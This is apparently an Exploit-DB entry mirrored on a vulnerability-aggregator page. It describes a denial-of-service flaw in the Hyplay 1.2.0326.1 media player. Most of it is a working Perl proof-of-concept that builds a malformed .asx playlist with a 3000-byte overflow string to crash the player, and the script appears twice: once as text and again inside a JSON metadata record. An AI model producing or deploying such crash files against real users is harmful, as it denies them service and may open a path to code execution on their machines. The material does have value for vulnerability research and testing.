Search...

Hyplay 1.2.0326.1 - .asx Remote Denial of Service Vulnerability

2010-05-10T00:00:00

ID EDB-ID:33973
Type exploitdb
Reporter Steve James
Modified 2010-05-10T00:00:00

Description

Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/40048/info

Hyplay is prone to a remote denial-of-service vulnerability.

Attackers may leverage this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.

Hyplay 1.2.0326.1 is vulnerable; other versions may also be affected. 

#/usr/bin/perl
#Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC
#Download: http://www.hyplay.com/download.asp
#Written/Discovered by: xsploited Security
#Tested on Windows XP SP2
#URL: http://x-sploited.com/
#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca
 
#A bug exists in the way Hyplay processes malformed .asx play
#list files. This could potentially lead to code execution on
#the users machine.
 
my $data1=  
"\x3C\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20".
"\x22\x33\x2E\x30\x22\x20\x3E\x0D\x0D\x0A\x3C\x65\x6E\x74\x72".
"\x79\x3E\x0D\x0D\x0A".
"\x3C\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3D\x20\x22";
 
my $data2="http://";
 
my $data3= #asx file footer
"\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x65\x6E\x74\x72\x79\x3E\x0D".
"\x0A\x3C\x2F\x61\x73\x78\x3E";
 
my $junk = "\x41" x 3000;
open(my $playlist, "&gt; hyplay_d0s.asx");
print $playlist $data1.$data2.$junk.$data3."\r\n";
close $playlist;
print "\nEvil asx file created successfully.";

JSON Vulners Source

Initial Source

{"hash": "519522f042594cc735ea65e519f30048ce7b60ad0109fe9d66a791f3199c280b", "id": "EDB-ID:33973", "lastseen": "2016-02-03T20:13:45", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/33973/", "description": "Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability. Dos exploit for windows platform", "title": "Hyplay 1.2.0326.1 - .asx Remote Denial of Service Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/40048/info\r\n\r\nHyplay is prone to a remote denial-of-service vulnerability.\r\n\r\nAttackers may leverage this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.\r\n\r\nHyplay 1.2.0326.1 is vulnerable; other versions may also be affected. \r\n\r\n#/usr/bin/perl\r\n#Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC\r\n#Download: http://www.hyplay.com/download.asp\r\n#Written/Discovered by: xsploited Security\r\n#Tested on Windows XP SP2\r\n#URL: http://x-sploited.com/\r\n#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca\r\n \r\n#A bug exists in the way Hyplay processes malformed .asx play\r\n#list files. This could potentially lead to code execution on\r\n#the users machine.\r\n \r\nmy $data1= \r\n\"\\x3C\\x61\\x73\\x78\\x20\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\".\r\n\"\\x22\\x33\\x2E\\x30\\x22\\x20\\x3E\\x0D\\x0D\\x0A\\x3C\\x65\\x6E\\x74\\x72\".\r\n\"\\x79\\x3E\\x0D\\x0D\\x0A\".\r\n\"\\x3C\\x72\\x65\\x66\\x20\\x68\\x72\\x65\\x66\\x20\\x3D\\x20\\x22\";\r\n \r\nmy $data2=\"http://\";\r\n \r\nmy $data3= #asx file footer\r\n\"\\x22\\x20\\x2F\\x3E\\x0D\\x0A\\x3C\\x2F\\x65\\x6E\\x74\\x72\\x79\\x3E\\x0D\".\r\n\"\\x0A\\x3C\\x2F\\x61\\x73\\x78\\x3E\";\r\n \r\nmy $junk = \"\\x41\" x 3000;\r\nopen(my $playlist, \"> hyplay_d0s.asx\");\r\nprint $playlist $data1.$data2.$junk.$data3.\"\\r\\n\";\r\nclose $playlist;\r\nprint \"\\nEvil asx file created successfully.\";\r\n", "objectVersion": "1.0", "cvelist": [], "published": "2010-05-10T00:00:00", "osvdbidlist": [], "references": [], "reporter": "Steve James", "modified": "2010-05-10T00:00:00", "href": "https://www.exploit-db.com/exploits/33973/"}